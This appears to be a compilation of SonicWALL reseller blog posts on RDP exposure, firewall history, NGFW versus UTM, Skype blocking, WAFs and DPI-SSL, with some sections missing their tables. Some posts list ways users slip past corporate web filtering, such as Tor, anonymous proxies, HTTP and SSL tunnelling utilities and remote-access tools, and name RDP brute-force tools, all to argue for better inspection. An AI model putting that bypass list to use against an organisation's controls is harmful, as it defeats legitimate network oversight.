Microsoft Remote Desktop services (RDP) are very often used to:

• Remotely manage a Windows-based machine like a Windows server.
• Gain access to some resources on a Windows-based computer.

Using RDP over Internet

A very tempting way of using RDP is to expose the RDP server to the Internet by “opening” the needed port on the edge firewall; typically the server listens on TCP port 3389. Then the remote user uses his RCP client to connect to this server.

Why not expose directly to the Internet the RDP server

There are a couple of problems with directly exposing the RDP server to the Internet:

• Your RDP server can become a target for automated brute-force attacks. For example the Morto worm targeted RDP a while ago and huge spikes in RDP TCP port 3389 scans were reported by the SANS Storm Center at that time. The worm used a list of passwords for the default administrator user name in an attempt to gain access to the system over RDP.
• Attackers specifically search for open RDP ports and attempt to log into the RDP server by guessing the username and password. Publicly available tools like ncrack, tsgrinder or RDP Brute Force make easy such attacks.
• You may forget that RDP was allowed from the Internet to an internal machine and an RDP vulnerability to appear; in the most fortunate scenario attackers may “only” manage to DoS the exposed server.
• Normally in the default configuration the RDP connection is vulnerable to MITM attacks as it only provides encryption but does not authenticate the server. While you can mitigate these using TLS or Network Level Authentication (NLA), you need to configure appropriately both the servers and clients; specifically all your RDP servers and clients.
• Not only the server is exposed, the client can be too; speaking about MITM attacks, in the context of the MS09-044 RDP vulnerability, a hacker could execute code on the client’s machine.

Why access the RDP server over VPN

Accessing the RDP server over VPN provides certain advantages:

• The VPN server authenticates and authorizes the users to use RDP; first a user must successfully authenticates himself with the VPN server (strong authentication it’s easy to implement these days), then the VPN server will allow only permitted users to access the administrator specified RDP servers.  And the attempted access will be logged on the VPN server.
• Mitigates MITM attacks and prevents unauthorized access to the RDP server.
• At no time attackers have direct access to the RDP server/client.
• A SSL VPN server it’s easy to setup. Users can use the browser for clientless SSL VPN access or a full blown SSL VPN client if needed. SSL VPN can be used from many remote locations where outbound traffic is restricted and also allows the secure access to other internal resources.

Conclusion

Using RDP without VPN exposes both RDP servers and clients to various attacks. SSL VPN can represent a simple and convenient way of securing RDP.

The history of firewalls dates back to the late 1980s. Their evolution was not necessarily dictated by technological revolutions, rather was imposed by the philosophy of designing and architecting security at the gateway level; it went down to the market demand. Technology offering strong security was present from the early years but did not catch. Instead a model offering lesser security but better usability and performance emerged as a dominant force in the firewall market. This has slowly evolved surrounded by niche players.

Timeline of firewalls evolution

We can view in the below timeline major events that occurred in the history of firewalls:

• The first firewalls were routers with filtering rules in the late 1980s.
• Between 1989 and 1994 there is a little boom in firewall research and the firewall market appears along with the first commercial firewalls.
• The static packet filter represents a first generation of firewalls; Jeff Mogul’s screend was an example in 1989.
• Steve Bellovin and Bill Cheswick from AT&T Bell Labs came with a circuit relay firewall in 1991, probably the first form of stateful packet inspection firewall. Stateful packet filters firewalls are called by some second generation firewalls.
• Marcus Ranum invents the application proxies and DEC SEAL, the first commercial firewall, appears in 1991 using them. At this stage, we can speak about the third generation of firewalls, application gateways or proxy firewalls. Furthermore, with DEC SEAL we already have a hybrid firewall, as a combination of application proxies and packet filters is used.
• In 1994, Check Point debuts Firewall-1, a stateful inspection firewall with a GUI; basically it’s a stateful packet inspection firewall with some application layer intelligence. It’s an alternative to the proxy firewalls. It has the advantage of being fast due to the light inspection, easy to use and can control all network traffic as it does not need a proxy for each application. Stateful inspection firewalls can be called fourth generation firewalls.

• In addition to filtering, firewalls start to incorporate more features like VPN, first called firewall-to-firewall encryption and introduced by the ANS Interlock firewall. Other features like QoS, URL screening or antivirus scanning are added too.
• Main firewalls are hybrid firewalls, incorporating both stateful inspection and proxies. The stateful inspection dominates and other vendors follow the trend initiated by Check Point. Proxy firewalls are niche players.
• In the late 1990s, specialized application firewalls protecting applications appeared also as niche players; the early WAFs.
• With the incorporation of new features we began the transition to UTMs and DPI; the UTM term was coined in 2004 by IDC. They are the result of more security and control being needed for cleaning the traffic from threats. In 2003 we see many vendors launching “all-in-one” security products.
• Also in 2003, Gartner starts speaking about Next Generation Firewalls.
• UTMs may control web traffic per users with the help of a web proxy.
• In parallel with the firewall evolution: in 1996 Squid proxy appears; in 1998 Snort IDS is created; in 1999 the first commercial IPS Network ICE's BlackICE IPS debuts. Squid and Snort will be integrated into many UTMs over the time.

• After 2004 the UTM market and UTM products evolve. UTMs are plagued by performance issues and the limitation of the level of inspection into the application layer. More and more the term DPI is used.
• In 2006, WAFs are defined with the help of the Web Application Security Consortium. As time goes by, they will become a stronger presence on the market.
• In 2008 Palo Alto Networks claim they have a Next Generation Firewall; this solves UTM’s performance issues and provides greater control and visibility into network traffic shifting the game into managing(identify, block, allow, monitor and shape) applications and their features per users.
• In 2009 Gartner defines the Next Generation Firewall.
• Today, 2012; the market for Next Generation Firewall is on the rise with a couple of vendors offering such gear; to name a few: Palo Alto Networks, SonicWALL or Fortinet. The specialized application firewalls market is also stronger, with many WAFs and Database Firewall vendors.

Affected SonicWALL Firewalls

The SonicOS 5.8.1.5 release is supported on the following SonicWALL Deep Packet Inspection (DPI) security appliances:

Resolved Issues in SonicOS 5.8.1.5

Content Filtering System

DPI-SSL

Networking

Users

Visualization

WAN Acceleration

Wireless

Donwload: SonicOS Version 5.8.1.5 Release Note

Where to Download Updates

Log into your www.mysonicwall.com

Click on Downloads > Download Center > from the “Software Type” dropdown box select your firewall’s firmware.

A lot of buzz was made by NGFWs(Next Generation Firewalls) and people wonder how a NGFW differs from an UTM(Unified Threat Management Gateway).

They seem to share many similarities and this makes things quite confusing.

One key aspect that differentiates the two is the functionality delivered.

Unified Threat Management Gateways (UTMs)

The UTM term was coined by IDC.

UTMs appeared as a response to blended threats. A simple stateful inspection firewall wasn’t able to defend the network against the multitude of threats.

To deal with these threats, enterprises can chain a couple of boxes like:

• Regular stateful protocol inspection firewalls.
• Web proxies for URL/content filtering and antivirus/malware scanning.
• Intrusion Prevention Systems(IPS) for monitoring and blocking malicious activities.
• Spam filtering to filter spam emails.

 But this “chaining” can introduce certain management issues, so a solution was to collocate all these services on a single appliance called UTM.

Next Generation Firewalls (NGFWs)

The term Next Generation Firewall term was coined by Gartner.

Gartner argue that the NGFW is the evolution of the enterprise firewall market, while UTM is aimed at the SMB/branch market. Some UTM vendors disagree and state that their gear is capable of serving enterprises.

• NGFW does not merely collocate security services under a single appliance; it integrates them(e.g. the firewall is integrated with the IPS, antivirus, etc.), the end result being a single-pass engine.
• NGFW delivers wire-speed network security. This is possible due to the integration of the security services and the use of a single engine.
• NGFW offers application control and great real-time visibility into the network traffic. One fundamental capability of a NGFW is to control applications and their features meaningless of port and protocol while optimizing the traffic flow.
• NGFW can control the access to resources based on users or group of users(e.g. integration with Active Directory for user-based policies). This is possible for all network traffic, not just web traffic.

UTM and NGFW face to face

Let’s analyze the two and see how they compare.

Conclusion

As we saw, an UTM can do many of the things a NGFW does. The UTM normally rather collocates security services on a single appliance while the NGFW integrates them into a single engine on a single appliance.

As a result, the NGFW takes to a different level the performance offered when DPI is performed while offering great application control and visibility into the network traffic.

Port forwarding enables remote clients to access a specific service on a server located on the internal network behind the firewall. It is a form of NAT which allows you to forward a specific port to a specific host.

• The remote clients can be Internet users or remote employees.
• The services accessed by these users can be HTTP, FTP or SMTP to name a few.

Why Do You Need Port Forwarding

Port forwarding is used when you have a single public IP address or a limited number of IP addresses along with multiple internal servers that need to be accessible from the Internet. You cannot dedicate a public IP address to every internal server because you do not have so many IP addresses. Instead you forward a specific port to the needed internal server; the port forwarded is the port on which the service on the internal server listens to.

How Port Forwarding Works

Consider the case where you have a single public IP address on the WAN interface of the firewall and a couple of internal servers running different services. For example one server is a web server, other a FTP server and another one a SMTP mail server.

• The web server’s case: TCP port 80 used by HTTP will be forwarded to the internal web server. The remote clients’ requests will be destined to the firewall’s public IP address on port 80; the firewall will translate the destination IP address to the internal web server’s private IP address and will forward the translated requests to this server.
• Similar with the mail server; Assuming that SMTP is running on the mail server, the TCP port 25 used by SMTP will be forwarded to the internal mail server.
• Almost the same with FTP and its TCP port 21. The difference is that FTP may use additional dynamic ports for data transfers, so the firewall will use a FTP NAT helper to sense which other ports need to be automatically forwarded to the server.

SonicWALL Port Forwarding How-To Video

Latest surveys indicate that employees use personally owned mobile devices for work and this trend will increase in the future; the enterprises need to urge in supporting these employee-owned mobile devices because they can dramatically increase the work productivity allowing an outstanding level of mobility.

Employees can use their own smartphones or tablets to remotely access corporate resources from public Wi-Fi networks which provide free or cheap Internet connections.

There are a few challenges in providing these remote workers with the level of access they need:

• Due to the untrusted nature of the Wi-Fi networks they use, strong encryption and authentication is needed for all the connections they initiate back to the corporate network meaningless if the original applications provide or not such security.
• They access many resources like email, file shares, various simple or complex applications.
• SSL VPN portals are neat but only provide limited access; remembr that for extended functionality they make use of ActiveX controls or Java applets while the mobile browsers either do not run them or offer limited support for them.
• Unified secure remote access: a single VPN client that would offer the needed level of access would be great making sure the traffic destined to the corporate network is protected especially when the Internet connection is a wireless hotspot.
• The mobile devices being unmanaged endpoints can be a door for malware/viruses to enter the corporate network; the traffic from the mobile devices must be scanned and cleaned from such threats.

A unified VPN client to the rescue for accessing the corporate resources

SonicWALL Mobile Connect is a single VPN client, SSL-based, allows easy and secure remote access to needed resources for employees owned mobile devices capable of using wireless connections. Furthermore the same VPN client can be used inside the corporate network from a local WLAN to access the internal network without the need to provision an authenticated and encrypted wireless connection.

Such a client can be the SonicWALL Mobile Connect unified client app for Apple iOS.

• It’s easy to obtain and install as it’s downloadable from the App Store; users can install it on their own iPhone or iPad.
• It uses encrypted SSL VPN connections to ensure confidentiality and data integrity; users’ traffic is protected while they travel and access the corporate networks from public Wi-Fi hotspots.
• It has a VPN on Demand feature that encrypts traffic whenever users attempt to access protected internal resources like an application, web site or host.
• With the SonicWALL Next-Generation Firewall on the corporate network, a Clean VPN solution can be achieved as the firewall scans the mobile VPN clients’ traffic for viruses, malware, worms or spyware applying IPS, Gateway antivirus and Antispyware inspection. Furthermore the SonicWall firewall’s application control functionality can define how applications and bandwidth are used.
• When they are back at the corporate office, users can continue to use their own mobile devices to access the internal network with the same Mobile Connect client from the local WLAN.

Biggest Problem with Wireless Networks... Overlapping Wireless Radios

For networks that deploy a single wireless access point on their network (e.g. SonicWALL wireless firewall or the SonicPoint access points) radio spectrum overlap is not an issues.  But once you begin expanding your network with additional access points you can run into performance issues caused by channel overlap.

Channel overlap is caused when two or more wireless radios are assigned to and using the same wireless channels.  This can cause network congestion, dropped packets and many other issues that slow down the wireless network.

The Solution - Control Your Channels

By default, all SonicWALL wireless devices are setup to automatically assign channels to the wireless radio.  In an environment where there are multiple radios this method of deployment is no longer feasible.  Instead, you must manually setup your radios properly to prevent the overlapping.

In the following video we will demonstrate to you have your can view your entire wireless LAN, identify your access points and see the channels that may be overlapping.  In addition, you will learn how you can modify the radio on your SonicWALL wireless firewall and/or SonicPoints in order to maximize your wireless experience.

Skype is a proprietary voice over IP service that allows users to make voice calls over the Internet. Skype users can call each other free-of-charge; calling mobile phones or landlines costs a fee.

Skype can be useful for both home users and enterprises.

A quite common situation that appears for an organization is the need to allow the use of Skype for some users(for work related activities) while blocking the use of it for the rest of the users.

Skype is a peer-to-peer system rather than a client-server system which makes the blocking of it a little bit of a problem; in many cases network administrators manage to block Skype with their firewalls but they do not have enough flexibility to allow the use of it for some users. The block it’s either on or off for all users.

Why block Skype

• Opens a door for viruses and malware to enter your network without being stopped at the gateway level; Skype’s traffic is encrypted with a proprietary protocol and thus not inspected by the firewall.
• Users can abuse the use of it affecting the Internet bandwidth consumption(especially with file transfers) and these users may end up having low work productivity spending their time chatting with their friends.

Why allow Skype

• Represents a cost effective and high quality IP telephony solution; you do not to need to roll out your own VoIP infrastructure.
• Allows needed users to make work-related calls over the Internet saving your money.

How Skype works through the firewall

Skype can use both UDP and TCP; the preferred protocol for best performance is UDP.

Skype “probes” your firewall for open ports and can auto detect a local web proxy.
It can try first with UDP; if it fails it can switch to TCP and use the common web access TCP ports 80(HTTP) and 443(HTTPS) for connectivity.

Note that it can even work through an authenticating web proxy.

How to block Skype

Over the time administrators have come up with various solutions to block Skype. Most of them involve allowing only HTTP and HTTPS traffic outbound through the firewall; Skype is P2P and one cannot really block specific destinations.

• If the use of the HTTP protocol is enforced over TCP port 80, Skype will not be able to escape through this port as it uses a proprietary protocol.
• If a SSL inspection solution is used, Skype will not be able to escape through the TCP port 443 as it not uses TLS/SSL.
• If a standard web proxy is in place, Skype will use CONNECT requests destined to IP addresses; the proxy can block such requests.
• Use IPS signatures to block Skype if the network firewall incorporates an IPS.

Manage access to Skype with a SonicWALL NGFW firewall

Next Generation Firewalls(NGFW) like SonicWALL can control access to applications per users or group of users.

Immediately our brain begins to race.  Why is this site giving a certificate error?  Has it been hacked?  Is the admin too lazy to update the certificate?  Is it really ok for me to click continue?

As seasoned IT admins we know the consequences of clicking "continue".  We know that if we enter into a site with a funky certificate issue and download an app we may be inviting trouble.  Unfortunately, our network users don't have the same staying power or foresight  we do.  They have their "eye on the prize" and will not let a little certificate error stop them from downloading what they are after.

Enter SonicWALL SSL Control

SonicWALL's SSL Control feature allows you to setup the firewall to intercept these certificate errors before the end user receives it.  This takes away the bypass control from the end user and puts it into your hands.  

As you can see SonicWALL offers detection and/or blocking of several different kinds of certificate errors.  By implementing this feature you have added another layer of security to your network.

SonicWALL SSL Control in Action

This quick video demonstrates how the SSL Control feature works with the SonicWALL firewall.

SonicWALL SRA

SonicWALL SRA series appliances provide organizations with secure access to resources along with PCI compliance through the award winning Web Application Firewall.

Pros

• A full-blown SSL VPN gateway; offers a rich SSL VPN experience.
• A true virtual office; includes a fully featured SSL VPN portal allowing broad access to resources from the browser.
• Unlimited number of remote users; out-of-the-box the top model includes a 25 concurrent users license.
• Spike Licensing; temporary capacity add-on license that allows you to rapidly increase the remote user count in the event of an unexpected increase in demand; e.g. during a natural disaster or an emergency.
• Solid network level access using the NetExtender SSL VPN client.
• Mobile device support; the SSL VPN client is supported on many mobile platforms(Apple iPhone, Apple iPad, Android, Windows Mobile, etc.).
• Flexible network design; single-arm or two-arm deployment modes.
• Virtual cloud SSL VPN; also offered as a virtual appliance.
  
• Excellent protection for web applications; an optional WAF service is available which can help you achieve PCI compliance.
  
• Application Acceleration; SSL offloading or caching to name a few.

Cons

• For Clean VPN it must be coupled with a SonicWALL firewall.

SonicWALL Firewall SSL VPN

Offers an integrated security solution, an all-in-one security services appliance.

Pros

• The SSL VPN gateway is integrated, there is no need to deploy another appliance and manage it separately.
• Solid network level access using the NetExtender SSL VPN client.
• Mobile device support; the SSL VPN client is supported on many mobile platforms(Apple iPhone, Apple iPad, Android, Windows Mobile, etc.).
• Clean VPN; over the client’s VPN traffic multiple inspections can be applied(IPS, Antivirus, Content filtering, etc.).

Cons

• Not all the features of the SSL VPN appliance are available; e.g. all the portal’s features.
• Limited number of users; a dedicated SSL VPN appliance would be able to accommodate better the increasing number of remote mobile workers.
• Limited protection for web applications(IPS level).
• No virtual cloud deployment option;  if you plan to virtualize your SSL VPN infrastructure, the SonicWALL firewall is offered only as a dedicated hardware-based appliance.

The SRA advantage
You can continue to add more user licenses whereas the firewall will eventually run out of licenses and you may have to upgrade to the SRA to accommodate the increasing mobile workforce. Additionally your remote users will benefit from a true virtual office and your critical web applications from modern protection.

Advantages of expanding your wireless network

The latest standard 802.11n offers around 300 Mbps of rated bandwidth in theory; in practice if well designed, it will easily offer greater bandwidth than 100 Mbps -> high-bandwidth wireless LANs are possible.

• Rapid deployments; there is no need to pull cables through walls and ceilings to wire each PC. The wireless access point does not even require an AC power supply.
• Mobility; remove the need of a hard line for Internet and LAN access, thus the dependency on fixed desks. Users are able to roam if needed without having to plug or unplug any cables.
• Scalability and robustness; the wireless network can be easily extended and can accommodate various topologies. Wireless networks can cope better with disasters.
• Simplicity of the design; most of the network layout and functionality lays within the access point.

SonicWALL SonicPoints

SonicWALL SonicPoints are wireless access points specially engineered to work with SonicWALL firewalls to provide enterprise-level wireless access. They offer secure and fast access to data, voice and video over high-bandwidth wireless LANs.

• Easy deployment and management; from the SonicPoint section of your SonicWALL firewall's management Interface you can manage the SonicPoints connected to the security appliance; the SonicPoint configuration can be provisioned automatically once the device is connected and powered on.
• Clean Wireless; the wireless traffic is scrutinized and inspected in a similar way with the wired network traffic.
• Segment wireless networks within a single access point; a single SonicWALL can support up to eight SSIDs being able to offer both Open and WPA wireless networks to clients simultaneously.
• Integrated Wireless Guest Services; used to provide Internet access to guests.
• Enhanced throughput and reliability; multiple antennas are utilized to achieve this.
• High-bandwidth wireless LANs; the latest 802.11n standard is supported.

Expanding Your Network with a SonicPoint

The combination of a SonicWALL firewall and a SonicPoint offers many features that make it an excellent choice for many scenarios.

Using Virtual Access Point (VAP) segmentation, with a single SonicPoint, you can offer both Internet access to guest users and secure access to the LAN and Internet to corporate workers; the guest wireless network can be open or password protected while the corporate wireless network will be secured with WPA2+EAP.

Granular firewall rules can be applied to the entire wireless traffic, controlling all wireless clients' communications to any host on the local network or Internet; security services like IPS, gateway antivirus or content filtering can be applied individually to each wireless zone.

The wireless IDS protects against common types of illicit wireless activity.

The SonicPoint can receive power from a Power over Ethernet(PoE) Injector for easy deployments where electrical outlets are not available. Additionally, discreet deployments are possible with light and logo covers, controllable LEDs(except power) and internal antennas.

A minimum amount of bandwidth can be guaranteed to each wireless client.
Guest users with pre-defined static IP settings on their wireless adapters can use the guest WLAN to access the Internet; this is possible through the Dynamic Address Translation(DAT) feature.

SonicPoint features

• Varying on the model: PoE or/and AC Adapter and either internal or external antennas.
• Standards: 802.11 a/b/g/n.
• Security: WEP, WPA and WPA2; TKIP, AES ciphers.
• Wireless Authentication : Open, PSK, EAP.
• MAC Filtering.
• Profile Auto-provisioning.
• Centralized WLAN management.
• Virtual Access Points (up to 8).
• Clean Wireless.
• Wireless IDS; rogue access point detection.
• Wireless Guest Services.
• Wireless Roaming with ESSID.
• Dynamic Address Translation(DAT).
• FairNet wireless bandwidth allocation.
• Turn on the wireless radio only when is needed.
• SSL VPN Enforcement(with SonicWALL SSL VPN appliance).

• When possible, allow only TCP ports 80(HTTP) and 443(HTTPS) outbound through the network firewall for most users.
• Additionally enforce the use of the HTTP protocol over TCP port 80 and filter the web traffic(destination URLs, content, etc.).
• In some cases a web proxy might be in place to authenticate users.
• Normally traffic destined to TCP port 443(used by HTTP over SSL) is considered opaque being encrypted and thus will not be inspected; a non-transparent web proxy may filter it based on the host addresses seen in the CONNECT method requests of web proxy clients.

Where administrators fail

Users take advantage of the facts that:

• The traffic sent to TCP port 443 is opaque to the firewall; either it is encrypted with SSL or the firewall simply is not aware about the protocol passed over TCP port 443(any non-SSL protocols like SSH).
• The firewall has limited visibility into HTTP traffic; the firewall does enforce the use of HTTP over TCP port 80 but does not look very deep into the application layer.
• When a complex application uses additional ports and these will be allowed outbound through the firewall, users may access other external services on these ports.

HTTPS is opaque to the firewall

TCP port 443 is supposed to be used by HTTP over SSL. Naturally since SSL encrypts HTTP traffic, the firewall has no way to inspect what’s inside the SSL tunnel; it can be HTTP or any other protocol.

Some firewalls can detect if non-SSL traffic is passed over TCP port 443 and block them; others don’t. In any case, a content filtering solution cannot inspect SSL encrypted traffic if the firewall is not able to decrypt it.

Over the SSL tunnel users can browse the web for example.

Blacklist URL filtering solutions

Administrators block access to inappropriate sites using a URL filtering solution; e.g. bad known destinations.

Users setup their own proxies for tunneling traffic over HTTP on obscure destination servers which are not caught by a blacklist URL filtering solution; probably they fall into the unknown category and this is not blocked due to usability reasons. Additionally SSL can be used to access such sites.

Through the tunnels users access whatever destinations they like bypassing the URL filtering solution.

Limited visibility into HTTP traffic

An HTTP tunnel channel creates a legit HTTP connection; users tunnel through HTTP requests other protocols, like SSH. Over SSH users can browse the web for example.

The firewall only performs basic filtering on the HTTP application protocol and cannot detect its misuse:

• URL filtering(Filtering based on the URL).
• File types or extension filtering.
• Scans for malware and viruses.
• Includes a few signatures to block potential unwanted applications while users have access to tenths of such applications.

Limited application visibility

The firewall does not have signatures to identify and allow or block the needed applications meaningless of destinations and protocols.

As we saw above, an unwanted application can escape over regular ports(TCP port 80 and 433) or application protocols(HTTP or HTTPS).

It’s not enough to filter per port or protocol; the administrators must filter per applications or categories of applications.

A WAF is a tool used to protect web applications and web servers from attacks.

A WAF is deployed in front of a web application (or a web server) and intercepts the traffic between the clients and the application in order to:

Prevent unwanted user input to reach the application. Prevent unwanted content to be leaked by the application. Monitor the application traffic flow. Log transaction data.

How a WAF works?

A WAF can be an appliance or a server plugin. For example a hardware appliance that you deploy in front of your web server or a plugin that you install on your web server.

A WAF operates by using two main models:

A blacklist or negative model that denies what is known to be bad For basic protection, similar with an IPS but with a greater level of application intelligence, a WAF can use generic signatures for preventing well known attacks and specific signatures for attacks exploiting a particular web application’s vulnerabilities. A simple example: deny a certain malicious HTTP GET request and permit everything else.

A whitelist or positive model that permits only what is known to be good For advanced protection, in addition to the signatures, another type of logic is used: rules that define what is explicitly allowed. A simple example: allow just HTTP GET requests for a specific URL and deny everything else.

Why a WAF is needed?

Nowadays web applications are used for sensitive operations like online banking, retail sales, webmail or remote access. In many cases these applications are directly exposed to the Internet.

Additionally, a WAF is able to log full transaction data so you can monitor the operations of your web application.

Why do you need a WAF?

Hackers attack web applications to steal users’ credentials, extract information from databases, steal money, manipulate polls or create denial of services.

If you have a web application exposed to the Internet and your business relies on it, then attacks against it can disrupt your business operations, cause financial loss and affect your reputation.

• Preventing technical application attacks (e.g. XSS, SQL Injection).
• Preventing business logic attacks. These target flaws in the logic of a business application; they abuse the functionality of the application.
• Virtual patching; fix security vulnerabilities in your web application without touching the application.
• Web application hardening; reduce the attack surface.
• Monitoring your web application and detecting when attacks occur.

Fears associated with WAF deployments

Conclusion

A WAF is a tool specifically designed to protect web applications. The level of protection offered by a WAF for web applications is unmatched by existing IPS solutions.

SonicWALL, Inc.,today announced the SonicWALL Mobile Connect App is now available on the App Store(SM) for download to Apple devices such as iPad® and iPhone®. For users of SonicWALL's SSL VPN and Next-Generation Firewall product lines, the new SonicWALL Mobile App enables anytime, anywhere secure remote access and connectivity from Apple devices such as the iPad and iPhone to all network resources. A single unified SSL VPN client, Mobile Connect is supported across all current SonicWALL Secure Remote Access (SRA) and SonicWALL Aventail E-Class SRA, as well as SonicWALL TZ, Network Security Appliance (NSA), E-Class NSA and SuperMassive E10000 Series firewalls. Mobile Connect runs on iOS 4.2 and higher.

The SonicWALL Mobile Connect App provides users "VPN on Demand" and encrypts traffic whenever users attempt to access protected internal resources. Further capabilities are added when Mobile Connect users communicate through a SonicWALL firewall. Network administrators can enable Clean VPN (SonicWALL Gateway Anti-Virus, Anti-Spyware and Intrusions Prevention scanning over VPN connections) to afford iOS users the same level of protection as if they were on the internal network, and ensure that communications relayed through the iOS devices are clean of malware. Additionally, network administrators can utilize SonicWALL Application Intelligence and Control functionality to identify which iOS apps should receive critical bandwidth. This assures performance for key business, education and medical applications, while throttling down other bandwidth intensive applications not deemed important to the enterprise or school.

"Everyone knows that iPhones and iPads are revolutionary devices that have enabled a level of mobile productivity we haven't seen before," said Mark Bouchard, founder of AimPoint Group, LLC. "Mobile Connect makes it simple and straightforward for enterprises to embrace this game-changing platform by allowing millions of SonicWALL customers to securely access corporate networks and boost their mobile productivity even further."

For internal users of iOS devices, IT administrators are already able to utilize SonicWALL's Clean Wireless (data encryption and Gateway Anti-Virus, Anti-Spyware and Intrusion Prevention over WLAN networks) as well as SonicWALL Content Filtering services to meet compliance and policy requirements. Now, with the Mobile Connect App, users and organizations can be protected while traveling and accessing networks from public hotspots.

"iPads and iPhones have become the overwhelming choice for employees who demand anytime anywhere productivity," said Patrick Sweeney, vice president of product management and corporate marketing at SonicWALL. "Our Mobile Connect App lets companies extend their security policy to meet the stringent needs of enterprise, government and education institutions, while employees travel outside of the protected perimeter. This will help enable greater workforce productivity."

By deploying the SonicWALL Mobile Connect App, companies can take full advantage of the power and innovation of iPad and iPhone—simply and securely. IT organizations can now support iPad and iPhone users by giving them secure access to network resources, including shared folders, client-server applications, intranet sites, email and more.

In most cases users take advantage of the facts that traffic sent to TCP port 443 is opaque to the firewall and the firewall has limited visibility into HTTP traffic.

Some bypass methods used:

• Software tunneling applications.
• Anonymous web proxy sites.
• Tunneling Proxy Servers.
• Remotely accessing a computer.
• Cache websites.
• Access sites via email.

Software tunneling applications

There are many software applications, either browser add-ons or standalone applications, that users can install and use to tunnel their web traffic through the firewall. To name a few:

• UltraSurf.
• Tor.
• JonDo.
• Identity Cloaker.
• Various VPN services, some based on OpenVPN.

Some of these can tunnel traffic through the corporate web proxy too, even if it requires authentication. Note that the users’ traffic can be encrypted in the process.

To understand how many applications, for example alternatives to UltraSurf exist, you can visit: http://alternativeto.net/software/ultrasurf/.

Anonymous web proxy sites

When users cannot install any software on their machines, they use their browsers and access anonymous proxy web sites. On these sites, they enter the URL of the destination they want to visit, and they will access this destination through the proxy.

Some popular such web sites:

• Proxify.
• Hide My Ass.

A list of anonymous proxy web sites can be found at: https://proxy.org/cgi_proxies.shtml.

Note that users can buy themselves a domain and host a web site using Glype, CGIProxy or PHProxy to achieve the very same thing.

Tunneling Proxy Servers

Users can setup HTTP or SSL tunnel channels; through these channels SSH can be tunneled. Over SSH users can browse the web.

• Tunnel through HTTP requests; e.g. httptunel utility.
• Tunnel through SSL; e.g. stunnel utility.
• Tunnel through the corporate HTTPS proxy in case one exists; e.g. corkscrew or Proxytunnel utilities. The HTTPS proxy is an HTTP proxy that supports CONNECT requests.
• Use either SSH, OpenVPN or proprietary protocols directly over TCP port 443 through the firewall.

Remotely accessing a computer

Users can access their own computers at home with software normally used for the remote administration of a PC/ server. From the home computer they can browse freely the web. To name a few remote access applications:

• LogMeIn.
• TeamViewer.
• GoToMyPC.
• Remote Desktop Web Connection.

Some of them require the installation of a client, some not(e.g. use Broswer+Java).

Cache websites

Certain sites cache web content(e.g. search engines like Google have an option to display the cached content of an URL) and others archive web sites to preserve them at a unique moment in the past(e.g. Internet Archive: Wayback Machine).

When accessing the content of a needed web site, the content will not be served from the original site; instead it will be served from the caching site(Google Cache) or from the archive sites. This means that your URL filtering policy for destinations will not apply anymore.

Access sites via email

Some services like Web2Mail allow users to receive web pages or to search the web by email.

The firewall can deny HTTP access to such proxies, however when they use HTTPS(HTTP over SSL), this is no longer possible since the traffic is encrypted. Many anonymous proxy service web sites are able to utilize SSL these days creating security issues for enterprises.

• A SonicWALL firewall can inspect SSL traffic with its feature called DPI-SSL.
• This allows it to intercept the users' HTTPS traffic destined to the anonymous proxies, decrypt it and apply content filtering over it.
• The end result will be that access over SSL to anonymous proxy service web sites will be denied.

Content filtering of web content

Content filtering of web content is normally used by organizations to prevent users from viewing inappropriate/dangerous web sites or content.

Anonymous proxy service web sites

These services allow users to surf anonymously the web, hiding their original public IP addresses and tunneling their traffic so that they can bypass any firewall restrictions.

Normally users do not have to install any software on their machines, just use their browsers and access the anonymous proxy service's web site. On this site, they enter the URL of the destination they want to visit, and they will access this destination through the proxy.

Content filtering and anonymous proxy service web sites

As long as the anonymous proxy service web sites are visited over plain HTTP, access to them can be denied using the appropriate URL Filtering category on the firewall(Hacking/Proxy Avoidance Systems category on SonicWALL firewalls' Content Filtering service).

If the sites are accessed with HTTP over SSL, SSL will be used to encrypt HTTP(HTTP headers, HTTP payloads) so the firewall will only see the IP addresses of the destinations. Filtering on IP addresses is difficult and error prone.

Content filtering and SonicWALL DPI-SSL

With SonicWALL DPI-SSL you have the ability to apply over SSL encrypted traffic any type of inspection your firewall might be capable of. The Content Filtering service of your SonicWALL firewall can utilize DPI-SSL.

For inspecting the internal clients' SSL outgoing traffic, the Client DPI-SSL feature is used:

• The SonicWALL firewall acts as a SSL proxy between the internal clients and destination external servers; two SSL sessions exist: one between the client and the SonicWALL and the other between the SonicWALL and the server.
• The HTTP headers and HTTP payloads protected by SSL are exposed so filtering policies can be applied to filter URLs or inappropriate content.
• So the Content Filter service can deny access to anonymous proxy service web sites using SSL.

3 Item(s)

Show 10 20 50 75 100 200 per page

Sort By Position Name

1. 
   
   
   Finding Best Price...

   SonicWALL DPI-SSL for NSA 240/2400 Series

   Deep Packet Inspection of Secure Socket Layer (DPI-SSL) extends SonicWALL NSA 240/2400 Series Deep Packet Inspection technology to allow for the inspection of encrypted HTTPS traffic and other SSL-based traffic.

   • Request a Quote
2. 
   
   
   Finding Best Price...

   SonicWALL DPI-SSL for NSA 3500/4500/5000

   Deep Packet Inspection of Secure Socket Layer (DPI-SSL) extends SonicWALL NSA 3500/4500/5000 Series Deep Packet Inspection technology to allow for the inspection of encrypted HTTPS traffic and other SSL-based traffic.

   • Request a Quote
3. 
   
   
   Finding Best Price...

   SonicWALL Deep Packet Inspection for SSL  (DPI-SSL) Upgrade License - E-Class

   Deep Packet Inspection of Secure Socket Layer (DPI-SSL) extends SonicWALL’s Deep Packet Inspection technology to allow for the inspection of encrypted HTTPS traffic and other SSL-based traffic.

   • Request a Quote

3 Item(s)

Show 10 20 50 75 100 200 per page

Sort By Position Name

• IPsec-based.
• SSL-based; both clientless mode and VPN client.

IPsec-based remote access VPN

In IPsec-based VPNs, IPsec is used to protect and tunnel users’ data. IPsec-based remote access VPNs represent the traditional or old way of providing remote access to resources; such access requires a client to be installed on users’ machines.

SonicWALL provides an enhanced IPsec-based remote access VPN experience through SonicWALL Global VPN Clients. The VPN connection is robust, offers good performance and network level access.

SSL-based remote access VPN

In SSL-based VPNs, SSL is used to protect users’ data. SSL-based remote access VPNs represent the newer or modern way of providing anywhere remote access to resources; such access does not necessarily require a client to be installed on users’ machines.

The clientless mode uses the browser as the base VPN client to provide access to client-server applications. The SonicWALL NetExtender, a SSL VPN client, offers network level access to resources.

IPsec-based remote access VPNs pros and cons

SSL-based remote access VPNs pros and cons

^{*ROI quantifies both costs and benefits}

Where to use SSL-based remote access VPNs

